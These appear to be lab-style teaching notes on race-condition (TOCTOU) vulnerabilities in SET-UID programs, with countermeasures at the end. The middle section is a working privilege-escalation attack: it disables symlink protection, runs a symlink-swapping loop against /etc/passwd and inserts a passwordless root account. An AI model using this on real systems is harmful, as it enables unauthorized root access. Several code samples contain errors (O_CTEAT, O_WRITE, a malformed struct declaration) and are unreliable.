# Race Condition Vulnerabilities


### Three Examples 
#### Example 1
The following PHP code introduces the example of a race condition: in banking system, when two withdraw of \$90 requests take place in a short interval, instead of accepting one and rejecting the other, the system could potentially withdraw \$180, which is undefined behavior. 

```php
function withdraw($amount)
{
    $balance = getBalance();
    if ($amount <= $balance) {
        $balance = $balance - $amount;
        echo "You have withdrawn: $amount";
        saveBalance($balance);
    }
    else {
        echo "Insufficient Fund."; 
    }
}
```

__Time of Check Time of Use__: A special type of race condition in software that occurs when checking a condition before using a resource. The condition could change between time of use and time of check. <br>
__Dirty COW__: allows attacker to modify any protected file, as only as file is readable to the attacker. It is able to be exploited for privilege escalation. Affects Linux and Android.

#### Example 2
The property of a SET-UID program is that when it is executed by a normal user, its _effective UID_ is root, but real UID is not root. The following program is SET-UID program and wants to write to /tmp, which is globally writable. The SET-UID program has root privilege to write to any files, but to enforce that only the real user can write to the file, the program checks if the real UID is correct. This is done through `access()` call. The program thus checks if the real user has the privilege to write to the file `/tmp/x`. 
```c
if (!access("/tmp/x", W_OK)) 
{
    f = open("/tmp/x", O_WRITE);
    write_to_file(f); 
}
else 
{
    fprintf(stderr, "Permission denied\n");
}
```
`open()` system call checks the effective UID of the program, whereas `access()` checks the real user ID for the program. The code on the system call `open()` from execution. However, there is a window between the time when file is checked and time when file is opened. <br>
To make use of the vulnerability in this 'blink of time', we can think of using __symbolic link__. Suppose that we want to modify the file `/etc/passwd`, but we can only write to `/tmp/x`. Now: 
* Before running the privileged program, we create a regular file X inside the `/tmp` directory. 
* This will pass `access()` check since it is our own file. 
* Right after `access()` can before program reaches `open()`, we quickly change `/tmp/x` to a symbolic link to the `/etc/passwd`. 
* When `open()` is invoked, it will open the passwd file, and since it only checks euid, now the program has write access to the file.
Since the modern processor runs instructions in less than miliseconds, it is very unlikely to successfully execute the linking in between. However, with large number of tries, it is possible to do the work right in the interval. 

To actually perform an attack, we need:
* The vulnerable program to run in a loop
* Run the attack program at the same time.
The __attacker__ runs the following instructions relentlessly: 
* __A1__: Make the `/tmp/x` point to a file owned by us. (simply create this file)
* __A2__: Make `/tmp/x` point to `passwd` (by symbolic linking) 
The __vulnerable__ program runs the following instructions relentlessly:
* __V1__: check users permission on `/tmp/x`
* __V2__: open the `/tmp/x` file for write

As long as the final sequence of execution is: $ \textbf{A}_1 \rightarrow \textbf{V}_1 \rightarrow \textbf{A}_2\rightarrow \textbf{V}_2$, we can achieve the goal.

#### Example 3
In the following program, another SET-UID, examines if a file exists, if not, it will create it and write to it. 
```c
file = "/tmp/x";
fileExist = check_file_existance(file);
if (fileExist == FALSE) 
{
    f = open(file, O_CREAT);
    //write 
    ...
}
```
So if between the check existance and the `open()`, we somehow make the name a symbolic link to `\etc\passwd`, we can again have write access to the passwd file. 

### Experiment Set up 
The following vulnerable program has the same problem as the `access` and `open` problem introduced before <br>
```c
#include <stdio.h>
#include <unistd.h>

int main() 
{
    char *fn = "/tmp/XYZ";
    char buffer[60];
    FILE *fp;
    
    scanf("%50s", buffer);
    if (!access(fn, W_OK)) 
    {
        fp = fopen(fn, "a+");
        fwrite("\n", sizeof(char), 1, fp);
        fwrite(buffer, sizeof(char), strlen(buffer), fp); 
        
    }
                           
    
}
```
Set it as SET-UID, as:
```
gcc vulp.c -o vulp
sudo chown root vulp
sudo chmod 4755 vulp
```
Then we need to turn off the Ubuntu countermeasure that does not allow symbolic link to a world-writable directory. 
```
sudo sysctl -w kernel.yama.protected_sticky_symlinks=0 
```

### Launching Attack

#### Phase 1: Choose the target 
The target for this attack is the `/etc/passwd` file, which contains users and their passwords. The goal is to create a new user with root privilege. For the root user, the third field is zero (there are seven fields total). The power of the root account comes from the UID field, which, here is zero. If we want to create an account with root privilege, we need to set the account uid to be 0. <br> 
```
root:x:0:0:root:/root:/bin/bash
```
The second field is the password field. `x` in this field means that the password is stored in `/etc/shadow`. To faciliate, we can simply provide a password here, which is a one way hash here. To get such a value, we can:
* Add a new user in our own system using `adduser` command, and then get one-way hash value of our password from shadow file. 
* Or simply use the magic value for password-less account. `U6aMy0wojraho`. 
If we succeed, we can make a `test` account that has root privilege but requires no password. <br>
```
test:U6aMy0wojraho:0:0:test:/root:/bin/bash
```

#### Phase 2: Run Race programs 
The vulnerable program should be run in an infinite loop: 
```sh
#!/bin/sh

while : 
do 
    ./vulp < passwd_input # password_input is the string to insert in passwd
done 
```

The attacking program has the following steps: 
* Create a symlink to a file owned by us. (to pass the access() check)
* Sleep for 10000 microseconds to let the vulnerable process run.
* Unlink the symlink
* Create a symlink to /etc/passwd (this is the file we want to open)

```c
#include <unistd.h>

int main() 
{
    while (1) 
    {
        unlink("/tmp/XYZ");
        symlink("myfile", "/tmp/XYZ");
        usleep(10000);
    
        unlink("/tmp/XYZ");
        symlink("/etc/passwd", "/tmp/XYZ");
        usleep(10000);
    }
    return 0;
}
```
If we successfully have the sequence execution of: __access__ -> __link to passwd__ -> __open__, we can create the new user.

#### Phase 3: Monitoring 
We need to monitor the passwd file to see if it has been written, which is done automatically with an upgrade from the previous script.
![check](./image_files/check.png)

When we begin the attack, we first run the attack program, then the vulnerable program, and wait for the script to stop. In the early stage, the terminal will throw out PERMISSION DENIED, due to access() failure, but evenutally the script will terminate and we will have write to the passwd file. Once passwd file is written 
```
su test
```
will give us a root shell with no password. 

### CounterMeasures: 
Questions:
* How do we eliminate the window between check and use?
* how do we prevent others from doing anything inside the window?
* How do we make it difficult for attackers to win the "race"? 
* How do we prevent attackers from causing damages after they have won the "race"? 

#### Atomic Operations 
Completely eliminate the check and use window by making the whole operation atomic. <br>

__File existence case:__ 
To ensure the atomicity of existence check and open, one can specify the flag `O_EXCL`. When using `open` with both `O_CREAT` and `O_EXCL`, when the file already exists, the specified file will not be opened. When these two flags are used, symbolic links are also not followed. If the filename is a symlink, `open` will fail regardless of outcome. In fact, the whole if condition in previous vulnerable code can be removed. 
```c
f = open(file, O_CTEAT | O_EXCL);
```
__File Writable Case__:
Moreoever, to solve the write privilege check and write race condition, we can combine the functionality with open() with following:
```c
f = open(file, O_WRITE | O_REAL_USER_ID);
```
But this is not yet existant. So the problem of acess() and open() is yet to be solved. 

#### Repeating Check and Use 
Add more race conditions to the code, such that the attacker needs to _win them all_ to succeed. In the following example:
* check-and-use is done three times 
* check if the inodes are the same 
* for a successful attack, `/tmp/XYZ` needs to be changed 5 times: one change for each window
* The chance of winning the race 5 times is much lower than once.

```c
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>

int main()
{
    struct stat, stat1, stat2, stat3; 
    int fd1, fd2, fd3;
    
    if (access("/tmp/XYZ", O_RDWR)) 
    {
        fprintf(stderr, "Permission Denied");
        return -1;           
    }
    // ----window 1---------
    else fd1 = open("/tmp/XYZ", O_RDWR);
    //-----window 2---------
    if (access("/tmp/XYZ", O_RDWR)) 
    {
        fprintf(stderr, "Permission Denied");
        return -1;           
    }
    //-----window 3--------------
    else fd2 = open("/tmp/XYZ", O_RDWR);  
    //-----window 4---------------
    if (access("/tmp/XYZ", O_RDWR)) 
    {
        fprintf(stderr, "Permission Denied");
        return -1;            
    }
    //------window 5----------------
    else fd3 = open("/tmp/XYZ", O_RDWR);  
 
    //check whether fd1, fd2, fd3 are the same inode
    fstat(fd1, &stat1);
    fstat(fd2, &stat2);
    fstat(fd3, &stat3);
 
    if (stat1.st_ino == stat2.st_ino && stat2.st_ino == stat3.st_ino 
        && stat3.st_ino = stat1.st_ino ) 
    {
        write_to_file(fd1);
    }
    else {
        fprintf(stderr, "Race condition detected\n");
        return -1;
    }
    return 0; 
}

```

#### Sticky Symlink Protection 
In Ubuntu, the built-in protection mechanism can prevent programs from following symbolic links under certain conditions, for example, for world-writable __sticky directories__ such as \tmp, symbolic links are not followed by programs. This prevents damage even if the race condition has been exploited. Mnual enable is:
```
sudo sysctl -w kernel.yama.protected_sticky_symlinks=1
```
In Linux filesytem, a directory has a special bit called __sticky bit__. When this bit is set, a file inside the directory can only be renamed or deleted by the file's owner, the directory's owner, or root. If not set, any user with write and execute permissions for the directory can rename or delete files inside the directory, regardless of who owns the files. Since /tmp directory is world-writable, to prevent normal users from renaming or deleting other users' files inside, its sticky bit is set. <br> 
When a sticky symlink protection is enabled, symlink links inside a sticky world-writable directory can only be followed when the owner of the symlink matches either the follower or the directory owner. <br> 

#### Principles of least privilege
Instead of extra check, simply disable the program's privilege for certain tasks.
```c
uid_t real_uid = getuid();
uid_t eff_uid = geteuid();

seteuid(real_uid);  //disable root privilege

f = open("/tmp/X", O_WRITE); //now safely without check
//...
//if needed, restore
seteuid(eff_uid); 

```